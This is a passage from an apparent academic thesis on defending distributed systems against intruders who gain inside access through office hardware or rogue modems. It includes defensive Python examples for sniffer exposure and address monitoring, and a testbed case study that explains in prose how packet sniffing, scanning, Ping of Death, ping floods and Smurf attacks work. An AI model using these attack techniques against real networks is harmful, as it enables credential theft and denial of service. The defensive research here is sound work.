would entirely eliminate the possibility of pseudo-internal intruders in the system. We
know, however, that experts caution against assuming that any defensive actions will
totally preclude intruders from gaining access to a system. Therefore, we will secondly
address the issue of minimizing the effect of pseudo-internal intruders who do gain
access to the network configuration. Lastly, the issue of detecting, monitoring, and
recording pseudo-internal intrusions will be addressed. The combination of these three
steps provides an effective overall security strategy to defeat the pseudo-internal intruder.
Prevention of access to the network configuration has two aspects: perimeter
defenses and physical configuration control. The objective of perimeter defenses is to
stop as many intruders as possible at the perimeter in order to deny them access to any
part of the distributed system. We will only be concerned with physical perimeter
defenses since pseudo-internal intruders entirely circumvent network perimeter defenses.
While network perimeter defenses play a vital role in distributed system security, they do
not protect against threats already inside the network perimeter and have no bearing on a
discussion about pseudo-internal intruders. Since there is a distinct possibility that
perimeter defenses will fail in stopping all intruders, it is necessary to protect each
component of the network configuration from unauthorized access. Physical
configuration control is any process by which the owners of a distributed system ensure
that no unauthorized hardware can be introduced to the physical configuration and that
authorized hardware is not used for unauthorized actions. In effect, physical
configuration control places some type of barrier around each component of the physical
configuration to prevent intruders from accessing such components or adding their own
pieces of hardware to the configuration. Such a barrier to unauthorized use can include
security measures like frequent inspections as well as traditional physical and digital
barriers.
The second step in the overall system defense against pseudo-internal intruders is
limiting the abilities of pseudo-internal intruders that do gain access to the network
configuration by adequately controlling the network configuration. Network
configuration control is the manner in which the network configuration is managed to
ensure the highest degree of security, while complying with functionality requirements.
Remember that the network configuration not only includes all of the hardware of the
physical configuration and the avenues of digital communication, but the protocols used
for communication, and the way that communication is segmented. The network
configuration not only dictates the path communication follows, but how nodes in the
distributed system are allowed to communicate. By correctly managing such protocols,
network attributes, and segmentation, system administrators can make it more difficult
for pseudo-internal intruders to utilize and gather information from the network
configuration. The ways in which network configuration control can be practiced will be
further explained in the next section.
There is always the possibility that all attempts to deny pseudo-internal intruders
access to the network configuration will fail. Successful pseudo-internal intrusions
should be identified and located as soon as possible. The process of network
configuration monitoring, the last piece of overall system security, continuously observes
all aspects of the network configuration searching for evidence of intruders. Successful
monitoring of the network configuration will alert system administrators to take
immediate action to prevent further damage to the distributed system.
The following sections will further explain each of the three steps of defending a
distributed system against a pseudo-internal intruder. Additionally, examples of each
method of defense will be offered to illustrate ways in which the method can be
implemented.
3.2
Defending the Distributed System: Preventing Intruder Access
Since chain link fences and armed guards do not contain any programs or data
communication ports, physical perimeter defenses are theoretically one of the easiest and
most straightforward forms of computer security. In practice, physical perimeter defenses are,
however, one of the hardest forms of security to implement effectively. Typically, the
more restrictive physical perimeter defenses are, the less efficient any workforce
hampered by such physical perimeter security policies becomes. For example, only
allowing system administrators access to areas with machines (the most secure physical
perimeter defense) would not allow other employees to utilize the system (totally
ineffective workforce). Few physical configurations of large, practical distributed
systems reside within a physical perimeter that does not also contain the offices of many
employees and users of the system. The other practical drawback to physical perimeter
defense is that many of the possible pseudo-internal intruders have legitimate reasons to
cross the physical perimeter. Both example scenarios involved pseudo-internal intruders
with such legitimate access. When the industrial espionage agent took a job as a legitimate
custodian, he or she was entitled to access within the physical perimeter of the target
system. While the agent’s duplicity may have eventually been discovered, the gambit of
being hired as a custodian provided sufficient time to compromise the target system.
Likewise, the disgruntled employee certainly was entitled to access within the physical
perimeter of the target system. It would be unrealistic to expect a physical perimeter
defense not only to prevent access by unauthorized persons, but also to prevent
access by authorized persons planning to commit unauthorized actions, while still
allowing harmless authorized persons access.
Physical configuration control is the second aspect of preventing pseudo-internal
intruders from gaining access to any part of a distributed system’s network configuration.
Recall that any practical physical perimeter defense will still allow legitimate employees,
and those successfully masquerading as legitimate employees, access to the facilities
housing the target system. To prevent intruders who are able to cross the perimeter from
accessing the network configuration, physical configuration control measures protect
each component of the physical configuration to further decrease the chance of
unauthorized access. With respect to physical configuration control, components of the
physical configuration can generally be broken down into three groups: avenues of
communication (network cabling), communication facilitators (network devices), and end
points (workstations and servers). Each of these types of components has a unique
manner in which it can be individually protected. Running network cabling through
some type of conduit is one way to protect it. Lead conduit is often used because lead
attenuates the signals radiated by the cable, which makes it more difficult for
pseudo-internal intruders to use devices to monitor the traffic on encased network cabling.
Additionally, conduit that had been breached would be more easily observable to those
inspecting the physical configuration for signs of tampering or unauthorized devices. For
fiber optic network cables there are more advanced solutions like motion detectors and
devices that monitor any disturbances of the fiber optic cable [Gri95].
Network devices can be protected by locking the device in metal casing if located
in a relatively insecure area like a wiring closet. Like encasing network cable in lead
conduit, securing the network device would make it more difficult for pseudo-internal
intruders to monitor signals going in or out of the network devices, or to connect
unauthorized devices to the network configuration.
Lastly, the workstations and servers must also be encased against monitoring and
unauthorized use. Since it is unrealistic to have all machines encased in metal, it is
possible to require that all desktop computers have power-on passwords and screen saver
passwords to prevent anyone but the designated user of that machine from using it to gain
access to the network configuration. Power-on passwords require the user of a machine
to enter a password before the machine will perform any function, including booting the
operating system or accessing the floppy disk drive. Computers can be configured so that
a screen saver activates any time that the computer is not in use for a certain period of
time (usually 5-15 minutes). A screen saver password requires the user to enter a
password before the screen saver will deactivate and allow the machine to be used again.
Neither password protects the network jack the machine occupies: unplugging the machine
and connecting another device to its cable is exactly the kind of access to office network
jacks that the disgruntled employee scenario assumed, which is why cabling and network
devices need the separate protections described above.
Measures can also be taken to ensure that all hardware complies with TEMPEST, the
United States government specification for limiting compromising electromagnetic
emanations (the expansion ‘Transient Electromagnetic Pulse Emanation Standard’ is
widely quoted but unofficial). Without taking special precautions, intruders can gather
information by monitoring the electromagnetic emanations coming from hardware.
TEMPEST technology can be used to prevent intruders from being able to remotely gather
information from network hardware. There may, however, be legal implications depending
on the country in which the network is set up. A good explanation of TEMPEST, including
both offensive and defensive aspects and legal issues, can be found in [Eck85] and [Sel90].
Physical configuration control not only utilizes barriers to protect each component
of the physical configuration, but also is the process by which that protection is inspected
and monitored for violations. In this way, physical configuration control ensures that no
barrier to unauthorized access has been violated and no unauthorized devices added to the
physical configuration. Verification of physical configuration integrity is usually
achieved by educating the users of the system not to introduce unauthorized hardware
and continuously inspecting the physical configuration for unauthorized hardware. If any
unauthorized device is found it is either removed or receives the appropriate security
measures. This kind of inspection of the physical configuration aids in the discovery and
removal of unauthorized devices like packet sniffers that may have been placed in the
physical configuration by pseudo-internal intruders.
Such inspections also address the problem of rogue outside connects. Recall that
rogue outside connects are created when unauthorized hardware is added to the physical
configuration. Such unauthorized hardware can create an outside connect unbeknownst
to the system administrators. These unauthorized outside connects do not have network
perimeter defenses and are rogue outside connects. Physical configuration control
inspections identify unauthorized hardware. In this way, any rogue outside connect
discovered is either removed or becomes a normal outside connect protected by network
perimeter defenses.
3.3
Defending the Distributed System: Mitigating Intruder Access
Network configuration control measures are designed to make it more difficult for
a pseudo-internal intruder with access to the system to execute a successful attack. If
network configuration control measures prevent a pseudo-internal intruder from listening
to information (reading) from the target system or affecting change (writing) on the target
system, then there is little the pseudo-internal intruder can do.
Therefore, the first aspect of network configuration control is designing the
configuration so that information is available to as few as possible unintended recipients
(prevent unauthorized listening). This can be done either by encapsulating information
so that unintended recipients cannot read it, or by preventing the information from
reaching unintended recipients. One way of encapsulating information is to design an
encryption scheme for all information traveling over the network of the distributed
system. One possibility is to have hardware link encryptors that automatically encrypt
and decrypt packets as they travel through a certain length of network cabling. This
might be useful for areas where there was a higher possibility of intruders gaining access
to network cabling. Another option would be to have all information encrypted between
end-points (workstations or servers). This method of encryption would allow messages
to be sent that only the intended recipients can decrypt. Of course, this introduces the
question of key management which is outside the scope of this paper. The main
disadvantages to encryption are the cost, network latency, and implementation
difficulties. A good treatment of the problems, costs, and intricacies of encryption and
public key management can be found in [Den99] and [Sch96]. [And93] and [AN96]
specifically address common reasons why implementations of cryptosystems fail.
A less expensive method of eliminating the availability of information to
unintended recipients of any given packet is to configure the network into smaller
network segments. Recall that, using routers, a system administrator can have packets
passed on to only the small group of nodes that contains the machines of the actual
recipients. In many network protocols, each packet has a header with information about
that packet’s destination. Unlike hubs, which simply repeat packets to everything
connected to the hub, routers can examine the destination information of a packet and
only pass that packet on in the direction(s) for which it is intended. (A switch achieves
the same effect within a single segment at the link layer, forwarding each unicast frame
only to the port on which the destination hardware address was learned.) While this does
mean that every node on the same hub-based segment as the intended destination will
receive a copy of the packet, this is more desirable than every node in the entire network
configuration receiving a copy of the packet. This means that pseudo-internal intruders
that are sniffing the network for packets will only receive packets sent to or from a node
on the segment to which the intruder is connected.
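The effect of the two measures just described, encryption (link or end-to-end) and segmentation, on a sniffer placed at a given point can be worked through with a small model. The Python program below is an added example, not from the thesis; the topology, host names and traffic sample are constructed, and the model is deliberately simple: a hub repeats every packet to all nodes on its segment, a router copies a packet only onto the destination segment, a link encryptor turns a segment’s wire traffic into ciphertext, and end-to-end encryption leaves only the two endpoints able to read a packet. It compares a single flat hub with a segmented network, with and without encryption, for the same traffic.

```python
"""Which packets a sniffer on a given segment can capture and read.

Added example; not from the thesis. The topology, hosts and traffic are
constructed, and the forwarding/encryption model is intentionally simplified.
"""
from collections import Counter

# Hypothetical hub-based segments joined by one router.
SEGMENTED = {
    "floor1": {"ws-21", "ws-22", "shared-1"},
    "floor2": {"ws-30"},
    "servers": {"payroll", "fileserver"},
}
# The same hosts hanging off a single hub: no segmentation at all.
FLAT = {"lan": set().union(*SEGMENTED.values())}

# Constructed traffic sample as (source, destination) pairs.
MESSAGES = [
    ("ws-21", "payroll"),
    ("shared-1", "fileserver"),
    ("ws-30", "payroll"),
    ("payroll", "fileserver"),
    ("ws-21", "ws-22"),
]


def segment_of(topology, host):
    for name, hosts in topology.items():
        if host in hosts:
            return name
    raise KeyError("host %r is not in the topology" % host)


def segments_traversed(topology, src, dst):
    """Segments whose wire carries the packet: the source's (the hub floods it)
    and, if different, the destination's (the router copies it there and nowhere else)."""
    return {segment_of(topology, src), segment_of(topology, dst)}


def sniffer_view(topology, sniffer_segment, messages,
                 link_encrypted=frozenset(), end_to_end=False):
    """Classify each message as seen by a sniffer attached to `sniffer_segment`:
    'unseen' (never reaches that wire), 'ciphertext' (captured but unreadable)
    or 'cleartext' (captured and readable)."""
    view = []
    for src, dst in messages:
        if sniffer_segment not in segments_traversed(topology, src, dst):
            state = "unseen"
        elif end_to_end or sniffer_segment in link_encrypted:
            state = "ciphertext"
        else:
            state = "cleartext"
        view.append((src, dst, state))
    return view


def exposure(topology, sniffer_segment, messages, **options):
    """Counts of unseen / ciphertext / cleartext messages for one sniffer position."""
    return Counter(state for _, _, state
                   in sniffer_view(topology, sniffer_segment, messages, **options))


if __name__ == "__main__":
    cases = [
        ("single hub, sniffer anywhere", FLAT, "lan", {}),
        ("segmented, sniffer on floor1", SEGMENTED, "floor1", {}),
        ("segmented, link encryptor on server segment, sniffer there",
         SEGMENTED, "servers", {"link_encrypted": {"servers"}}),
        ("segmented, end-to-end encryption, sniffer on floor1",
         SEGMENTED, "floor1", {"end_to_end": True}),
    ]
    for label, topology, where, options in cases:
        print("%-62s %s" % (label, dict(exposure(topology, where, MESSAGES, **options))))
```

The four cases show the progression the section argues for: on one hub every message is readable from anywhere; segmentation removes the messages that never cross the sniffer’s wire; a link encryptor protects the segment it covers and nothing else; end-to-end encryption leaves the sniffer with traffic it can still count (who talks to whom, and how often) but cannot read.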
The other aspect of network configuration control is preventing unauthorized
communication over the network. Most network protocols have some method of
uniquely identifying potential recipients of network traffic. Any device that
communicates with other network devices must have one of these unique identifiers.
Therefore, the identifiers themselves can be managed in order to control which devices
can communicate on the network. For example, in an IP based network, all machines
must have an IP address in order to receive network traffic. There are methods of
managing these IP addresses from a central location (DHCP, described earlier, is one)
such that system administrators control whether a machine gets an IP address at all,
and if so, what IP address. This makes it more difficult for pseudo-internal intruders
to connect unauthorized devices to the network configuration and then run proactive
scanning utilities. Without a valid IP address, the unauthorized device would not be
able to receive the responses required for a proactive scan. Running a passive scan
without a valid IP address requires either a much more expensive and rare hardware packet
sniffer or a specially designed and configured operating system running a software
sniffer, as opposed to the common software packet sniffer running on a personal computer.
Note that this obstacle is a modest one: an interface in promiscuous mode does not need
an IP address to capture frames, and operating systems that allow this have become
common, so address management should be seen as a hindrance to proactive scanning
rather than as a defense against passive listening.
While a pseudo-internal intruder might correctly guess a usable IP address,
system administrators have a list of all authorized IP addresses if an IP address
management scheme is in use on that distributed system. The next section will explain
how system administrators can use such a list to monitor the network for potential
pseudo-internal intruders.
3.4
Defending the Distributed System: Detecting Intruder Access
We know that none of these security measures will entirely eliminate the
possibility of a pseudo-internal intruder gaining access to a target system. It is therefore
critical that the system administrator have timely knowledge of any pseudo-internal
intrusions. Knowledge of the existence of an intruder would allow system administrators
to perhaps apprehend the intruder, feed the intruder misinformation, or in the very least,
eliminate the intruder’s access to the target system. Network configuration monitoring
can provide system administrators with the needed warnings of pseudo-internal intruder
activities.
Network configuration monitoring includes checking for unauthorized or
incorrectly used unique identifiers (required to communicate on the network), querying
the network for unauthorized devices (the digital equivalent to visually inspecting the
physical configuration), and observing the status and presence of network devices that
should be present in the network configuration.
There are a variety of technical ways to actually monitor the network
configuration depending on its architecture. In a TCP/IP based network the unique
identifiers are the IP addresses. The sender and recipient IP addresses contained in each
packet’s header can be compared against a list of approved IP addresses to ensure that
only authorized devices are communicating over the network. The network can also be
scanned for unauthorized MAC addresses. A MAC address is a unique number assigned
to each piece of network hardware by the manufacturer. The vast majority of network
devices can be queried to report that device’s MAC address. System administrators can
keep a list of the MAC address of all authorized devices and then compare the results of
system wide queries to that list. Lastly, there are multiple ways to query a network
device to see if it is ‘alive’ or still operating and connected to the network. There are
several possible situations when a pseudo-internal intruder may need to disconnect a
network device to either gain access to the network configuration, or perhaps borrow that
device’s IP address (since no two devices can have the same IP address). So, if a
network device disappears from the network, even for a short period of time, system
administrators may want to physically check the status of that device.
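As an added illustration of the checks just described (example code written for this edition, not part of the thesis), the following Python compares the address pairs seen in captured frames, and the set of devices answering a liveness probe, against an authorized inventory. The node names follow the Chapter 4 testbed; the IP and MAC addresses, the captured observations and the probe results are constructed for the example.

```python
"""Network configuration monitoring: compare the addresses seen on the wire, and
the devices answering a liveness probe, against an administrator's inventory.
This is an added example, not code from the thesis; the node names follow the
testbed in Chapter 4, while the addresses and observations are constructed."""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set, Tuple

# Authorized inventory as the administrator would maintain it: IP -> MAC.
# Addresses are invented for the example.
AUTHORIZED: Dict[str, str] = {
    "10.0.1.1": "00:00:1d:aa:00:01",   # OAS
    "10.0.1.2": "00:00:1d:aa:00:02",   # OWk2
    "10.0.1.3": "00:00:1d:aa:00:03",   # OWk3
    "10.0.2.1": "00:00:1d:bb:00:01",   # MCDS
    "10.0.2.2": "00:00:1d:bb:00:02",   # MCDW
}

Alert = Tuple[str, str, str]   # (kind, ip, mac)


@dataclass(frozen=True)
class Observation:
    """One (source IP, source MAC) pair taken from a captured frame."""
    ip: str
    mac: str


def check_addresses(observed: Iterable[Observation],
                    authorized: Dict[str, str] = AUTHORIZED) -> List[Alert]:
    """Compare observed address pairs to the inventory.

    unknown_ip  : IP not in the authorized list (guessed or scanned-for address)
    unknown_mac : MAC not in the authorized list (new hardware on the wire)
    borrowed_ip : an authorized IP used by some other MAC (a disconnected
                  device's address taken over by the intruder)
    A cloned MAC combined with its matching authorized IP produces no alert
    here; that case must be caught by the liveness and port checks.
    """
    authorized_macs = set(authorized.values())
    alerts: List[Alert] = []
    for obs in sorted(set(observed), key=lambda o: (o.ip, o.mac)):
        if obs.ip not in authorized:
            alerts.append(("unknown_ip", obs.ip, obs.mac))
        elif authorized[obs.ip] != obs.mac:
            alerts.append(("borrowed_ip", obs.ip, obs.mac))
        if obs.mac not in authorized_macs:
            alerts.append(("unknown_mac", obs.ip, obs.mac))
    return alerts


def missing_devices(responders: Set[str],
                    authorized: Dict[str, str] = AUTHORIZED) -> List[str]:
    """Authorized devices that did not answer the liveness probe this round.
    Even a short absence deserves a physical check, since an intruder may have
    unplugged the device to take its port or its address."""
    return sorted(ip for ip in authorized if ip not in responders)


def audit(observed: Iterable[Observation], responders: Set[str],
          authorized: Dict[str, str] = AUTHORIZED) -> Dict[str, list]:
    """One monitoring round: address alerts plus devices that went quiet."""
    return {"alerts": check_addresses(observed, authorized),
            "missing": missing_devices(responders, authorized)}


# Constructed capture: normal traffic, then an intruder's laptop that first
# picked an unused address and later took over OWk2's address after OWk2
# was unplugged from hub OP.
LAPTOP_MAC = "00:a0:c9:11:22:33"
SAMPLE_OBSERVED = [
    Observation("10.0.1.1", "00:00:1d:aa:00:01"),   # OAS
    Observation("10.0.2.1", "00:00:1d:bb:00:01"),   # MCDS
    Observation("10.0.2.2", "00:00:1d:bb:00:02"),   # MCDW
    Observation("10.0.1.50", LAPTOP_MAC),            # laptop, guessed free IP
    Observation("10.0.1.2", LAPTOP_MAC),             # laptop using OWk2's IP
]
# Liveness probe sent while OWk2 was unplugged: everything but 10.0.1.2 answered.
SAMPLE_RESPONDERS = {"10.0.1.1", "10.0.1.3", "10.0.2.1", "10.0.2.2"}

if __name__ == "__main__":
    report = audit(SAMPLE_OBSERVED, SAMPLE_RESPONDERS)
    for kind, ip, mac in report["alerts"]:
        print(f"{kind:12s} ip={ip:10s} mac={mac}")
    print("missing:", report["missing"])
```

Run as a script it reports four address alerts and one missing device. The borrowed_ip case is the one the liveness check exists for: once OWk2 is plugged back in and answers from its own MAC the address alert clears, but the gap in the probe history remains as evidence that something was unplugged. A cloned MAC on the borrowed IP produces no address alert at all, which is why the count of ports in use on each hub is the complementary check.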
No defensive measure listed here is a singular solution to the problem of the
pseudo-internal intruder. Each measure narrows the possibility of a successful pseudo-internal intrusion. The measures do, however, represent an effective approach when all
of the measures are implemented for a distributed system. Note that the majority of the
suggestions for defending a distributed system against pseudo-internal intruders are cost-effective and require little extra hardware and software. These techniques can, however,
be combined with commercial intrusion detection systems for even more security.
While it seems certain that future pseudo-internal intruders will develop
techniques not considered by us, these techniques will still operate in the domain of a
target system’s network configuration. Access to the network configuration by
unauthorized persons is prevented by physical perimeter defenses, network perimeter
defenses, physical configuration control, and network configuration control. Network
configuration monitoring provides warnings to system administrators of authorized
persons committing unauthorized pseudo-internal intruder activities, and any
unauthorized persons that somehow gained access to the distributed system.
Chapter 4: Case Study
4.1 Introduction
The purpose of the case study was to illustrate the threat that a pseudo-internal
intruder represents to an average distributed system and how to mitigate this threat. The
case study had two phases. In the first phase, a set of pseudo-internal intruder attacks
was executed against a distributed system using common state of practice network
security. The results of the attacks and the ability of the system to detect the attacks were
recorded to illustrate how vulnerable the common network is to a pseudo-internal
intruder. The state of practice in network security is that a distributed system has
adequate to exceptional network perimeter defenses, but very few security measures
devoted to the detection of intruders within the network perimeter. A recent survey of
security practitioners in corporations, government agencies, and educational institutions
showed that out of 501 respondents only 42 utilized any form of internal intrusion
detection; as opposed to the 91 respondents utilizing firewalls [Pow99]. Even those
distributed systems that do have some sort of intra-network perimeter intrusion detection
usually check for authorized users committing unauthorized actions. This commonly
implemented type of internal intrusion detection does little to protect against pseudo-internal intruders because the detection systems examine the use of user accounts.
The second phase of the case study executed the same set of pseudo-internal
intruder attacks against the same distributed system. However, in the second phase of the
case study the network security recommendations of this thesis were implemented prior
to executing the attacks. The results of the attacks and the ability of the system to detect
the attacks were recorded in both phases. The benefits of the security recommendations
will be apparent by analyzing the differences between the results of the two phases of the
case study.
4.2 The Target System
The invasive nature of some pseudo-internal intruder attacks required that the
case study be done on a testbed distributed system, as opposed to an active real world
system. For example, it would not be feasible to execute a denial of service attack
against an operational distributed system, since system functionality would be degraded.
Although it was not possible to build a testbed distributed system as large as many real
world systems, an attempt was made to build a testbed distributed system that was
representative of a large real world system.
Node Name   Description                             Operating System   Segment (when applicable)
OAS         Operational Administration Server       Linux 2.2          1 (Operational)
OWk2        Operational Workstation 2               Windows98          1 (Operational)
OWk3        Operational Workstation 3               Windows98          1 (Operational)
MCDS        Mission Critical Database Server        Linux 2.2          2 (Mission Critical)
MCDW        Mission Critical Database Workstation   Windows95          2 (Mission Critical)
Table 4-1: Nodes in Testbed Distributed System
Our testbed network had 5 nodes, 2 hubs, a router, and a firewall. The equipment
was widely varying: nodes running multiple operating systems (Linux, Windows95, and
Windows98) and network devices from different vendors (ODS Networks, and
Cabletron). Additionally, the networking devices used were capable of supporting a
much larger network. The router was a 10 Gigabit per second capable Cabletron 6500
SmartSwitch with modules supporting Gigabit Ethernet, ATM, and Fast Ethernet. The
network configuration diagrams (figures 4-1 and 4-2) are drawn to show “the rest of the
network” cloud, which could contain many more nodes.
The testbed distributed system was divided into two halves: an operational group
connected to hub OP (Operational), and a mission critical group connected to hub MC
(Mission Critical). Node OAS (Operational Administration Server) was running Linux
2.2 and was the machine used by the system administrator of the target system. Node
OWk2 was a Windows98 operational workstation. Node OWk3 was another Windows98
operational workstation with an unauthorized modem attached. That unauthorized
modem was connected to an outside phone line creating a rogue outside connect. Node
MCDS (Mission Critical Database Server) was also running Linux 2.2. Node MCDW
(Mission Critical Database Workstation) was running Windows95. Any communication
to or from a mission critical node was considered to be mission critical communication.
To simulate the activity of a distributed system, several communication activities
were executed during each of the pseudo-internal intruder attacks. Nodes MCDS and
MCDW communicated with each other. Node OAS communicated with node MCDS.
Lastly, the user of node OWk3 connected to a POP mail server external to the testbed
distributed system to retrieve mail messages. Having a user from one node establish a
connection with another node and send a text file to that node simulated mission critical
communication. Each text file contained “Mission Critical Information” as the first line
and then information stating who the message was from and for whom it was intended.
For the purposes of the case study, each pseudo-internal intruder attack had the
goal of either intercepting or disrupting mission critical communication. Intercepting
user account names and passwords was a secondary goal. Pseudo-internal intruder
attacks came from two different sources: the unauthorized laptop connected to hub OP,
and the rogue outside connect created by the unauthorized modem on node OWk3. Both
of these attack sources are plausible real world possibilities. The previously mentioned
industrial espionage agent posing as a janitor could potentially gain access to a wiring
closet containing a hub. Likewise, an unwitting employee could connect a modem to an
office machine in order to be able to dial up from home and check e-mail without having
to purchase Internet service at home.
Figure 4-1: Network Configuration of Phase 1 Testbed System
As mentioned, the testbed distributed system in the first phase of the case study
was designed to represent the state of common practice in terms of network security
measures. The firewall was configured to let no outside traffic through that was not
requested by an internal host. This allowed machines on the inside to communicate with
the outside world, but only if the internal machine initiated the communication. In
general, this is restrictive from the viewpoint of functionality (no outside accessible web
pages), but is considered to be very strong network perimeter defense. This type of
firewall configuration was chosen to illustrate that even the strongest network perimeter
defenses have no effect on pseudo-internal intruders. The firewall will not be considered
again since no pseudo-internal intruder attack passes through the firewalled outside connection (the rogue modem on node OWk3 bypasses it entirely), and
therefore no attack will be influenced by the presence of a firewall.
Both the database and administration servers (nodes MCDS and OAS) had
audit logs enabled. The audit logs recorded an entry each time a request for service or a
query for information was received. Enabled audit logs represent average security
practice as long as an administrator regularly reviews them. All network devices (routers
and hubs) were configured in ‘out-of-box’ mode. That is, no changes were made to
factory settings. Likewise, all software, including operating systems, was installed from
the original retail media. That meant that no security patches or upgrades that were not
shipped with the software product were installed. Although such practices are considered
poor network security, one is more likely to encounter such installations rather than
continuously updated software and specially configured network devices. Lastly, no
internal encryption was used and no internal network intrusion detection packages were
in use.
4.3 The Pseudo-Internal Intruder Attacks
In order to adequately demonstrate the capabilities of a pseudo internal intruder,
we defined six different attacks. At least one of each of the four types of pseudo-internal
intruder attack tools and techniques (network assessment tools, packet sniffers, exploits,
and denial of service attacks) was represented in the set of six attacks. Recall also that a
pseudo-internal intruder requires one of two types of access: physical access to a part of
the network configuration, or a rogue outside connect. The following set of attacks
against the target system also included at least one attack from each form of access:
1) Packet Sniffer – Software [Laptop]
2) Network Assessment Tool – Active [Rogue Outside Connect]
3) Exploit – Ping of Death [Laptop]
4) Exploit (Hacker Program) – WinNuke (Ping of Death) [Laptop]
5) Denial of Service Attack – Ping Flood [Laptop]
6) Denial of Service Attack – Smurf Attack [Rogue Outside Connect]
Attacks 1, 3, 4, and 5 were executed from a Pentium II class laptop running Windows
98. The laptop was connected to the non-mission critical half of the distributed system
via an open port on hub OP (see diagram). As has been discussed, connecting the laptop
to hub OP simulated a pseudo-internal intruder with physical access to at least one piece
of the network configuration. Attacks 2 and 6 were executed from a remote laptop
connected to node OWk3 via a modem. The unauthorized modem represents a rogue
outside connect.
The first attack used a software packet sniffer from Network Associates called Sniffer
Pro LAN. The goal of packet sniffing is to intercept mission critical communication and
user account names and passwords.
The network assessment tool used for the second attack was NetRecon by Axent
Technologies. NetRecon allows the pseudo-internal intruder to direct it to actively scan a
range of IP addresses or simply attempt to scan everything on the network. NetRecon
provides the user with information about what operating systems nodes are running, what
services are active on the nodes, and how those services are vulnerable to attack.
The third attack was an exploit called the Ping of Death. It was found that sending an
abnormally large ping packet to a Windows95 machine would cause the machine to
either lock up or crash. The packet is an ICMP echo request sent as IP fragments whose reassembled size exceeds the 65,535 byte maximum for an IPv4 datagram; the reassembly code of an unpatched system overruns its buffer. When successful, such an attack eliminates the functionality of a
Windows 95 machine until the machine is rebooted. Microsoft released a security patch
for Windows 95 that prevented this problem from occurring, but many machines have
never had the security patch installed. Unless the owner of a machine specifically
downloaded and installed the security patch, their Windows 95 machine is
susceptible to the Ping of Death attack.
The fourth attack was the same as the third, except that a hacker program called
WinNuke was utilized by the pseudo-internal intruder. WinNuke is a program that runs
on Windows 95 or 98 machines and executes a Ping of Death attack against any number
of machines as directed by the user. (The name WinNuke is more widely associated with a different Windows 95 crash, triggered by out-of-band TCP data sent to port 139; that is a separate defect with a separate patch. The program used here was driven to send the oversized ping.)
The fifth attack was a denial of service attack called a ping flood. A ping flood is an
attack where the pseudo-internal intruder directs the laptop to continuously send ping
packets to a target machine at a high rate of speed. This attack effectively cuts off the
target machine from the network. The target machine is receiving so many ping packets
that it cannot respond to any other request for service. Even when the machine is able to
respond to a request for service, it is likely that the pathways of network communication
are clogged with the ping packets thereby making communication with any other
machine difficult.
The last attack is a different kind of denial of service attack called a Smurf attack.
In a Smurf attack, the pseudo-internal intruder directs a machine to send a ping packet to
multiple machines at once, typically by addressing it to a network’s broadcast address so that every host on that network receives it. The ping packet is constructed to appear as if it came from some
target machine. Therefore, all of the machines that receive the ping packet respond by
sending a packet to the target machine, and not the pseudo-internal intruder’s machine.
In this way, the target machine is overwhelmed in a manner similar to the above ping
flood, and each packet the intruder sends is amplified into as many replies as there are responding hosts. This attack has the advantage of being indirect (the ping flood is not coming from
the pseudo-internal intruder’s machine). The attack is shorter in duration unless the
attack machine continues to send the bogus ping packets to multiple machines.
4.4 Expected Results
Two results were recorded for each pseudo-internal intruder attack. The first
result was the success of the particular attack. Each attack had a stated goal, and the
success of an attack was determined by comparing the result with the goal. The second
recorded result was the ability of the distributed system to detect the attack, even if the
attack succeeded. The ability of the distributed system to detect an attack was judged by
examining the footprint of the attack and any security measures in place to examine
footprints. A footprint is any observable change in the network configuration of a
distributed system.
4.5 Results of Attacks on Target System – Phase 1
The following section will discuss the results of executing the set of attacks
against the Phase 1 target system.
1) Packet Sniffer – Software [Laptop]
-
Result: The packet sniffer successfully captured the exchange of the mission
critical text file and user names and passwords between nodes OAS and MCDS
and nodes MCDS and MCDW. A hub is a repeater: every frame that arrives on one
of its ports is copied to all of its other ports, whichever node the frame is addressed to.
A node that is not the intended recipient simply ignores the frame, unless that node is
running a packet sniffer, which places its interface in promiscuous mode and records
every frame it sees. In the phase 1 configuration the two hubs were not segmented from
one another, so frames exchanged between nodes on hub MC also reached hub OP, and
the sniffer on the laptop captured traffic between nodes MCDS and MCDW even though
the laptop was connected to a different hub. The packet sniffer also captured the external POP Mail
server account name and password of the user of node OWk2.
-
Footprint: The footprint for this attack is small. The only changes made to the
network configuration by the packet sniffer were an additional port in use on hub
OP (laptop plugged in to it) and an additional MAC and IP address in use on the
network. Without special configuration (none was used here), the laptop will
answer any MAC address or IP address scan and will show up on a network
assessment scan. That is, if the laptop receives any request to report its IP or
MAC address, it responds with the addresses it is using. But in the first phase
of the case study none of these things was being monitored. Therefore, the
footprint of this first attack is not observable without further security changes to
the system.
2) Network Assessment Tool – Active [Rogue Outside Connect]
-
Result: The active network assessment, via the modem line, succeeded in gaining
information on all nodes on the network, including what operating system was
running and what services were active. The scan reported that node MCDW was
a Windows 95 machine vulnerable to a Ping of Death attack. There were a few
added obstacles that the pseudo-internal intruder had to surmount to achieve the
successful scan. The user of node OWk3 who set up the modem had the option of
requiring a password to remotely connect to node OWk3. The pseudo-internal
intruder would have to obtain such a password to connect to node OWk3. Just as
physical security was ignored for the purposes of the case study, this issue was
also not considered, but it should be noted.
-
Footprint: The nature of the rogue outside connect required that the assessment
tool be run in active mode. The Point to Point Protocol connection between the
remote intruder and node OWk3 did not allow the intruder’s computer to
passively “listen” to communication over the network. The intruder’s computer
must actively request information by sending a packet to a host that requires a
response. Therefore, the footprint of this attack is larger than that of the packet
sniffer. While the modem connection does not require an additional IP or MAC
address to be assigned to the remote laptop, the active actions create traffic
coming from node OWk3. So any machine with audit logs enabled will record
that node OWk3 (the machine with the modem) was requesting information about
what services were running on the server. Any review of the audit logs would
reveal suspicious activity and likely result in the discovery of the unauthorized
modem. Therefore, the intruder would have to follow up the active assessment
with another activity since discovery is highly likely.
3) Exploit – Ping of Death [Laptop]
-
Result: The pseudo internal intruder was successful in locking up node MCDW
by sending an abnormal size ping packet (Ping of Death attack) from the laptop
on hub OP to node MCDW on hub MC. The workstation locked up and had to be
rebooted. There was no warning as to why the workstation locked up. Any unsaved
work was lost and the functionality of the machine was eliminated until it was
rebooted.
-
Footprint: The footprint for this attack is only slightly larger than the footprint
for attack 1. Other than the laptop’s presence on the network (discussed under attack 1), the only
additional change in the network configuration is the presence of the abnormal
size packet. Although there are servers with audit logs enabled that do receive the
abnormal size ping packet (since the hubs repeat every packet to all machines), the servers
do not record the event since the packet is not intended for that machine. There
are no other security measures in place in phase 1 to detect the Ping of Death
attack.
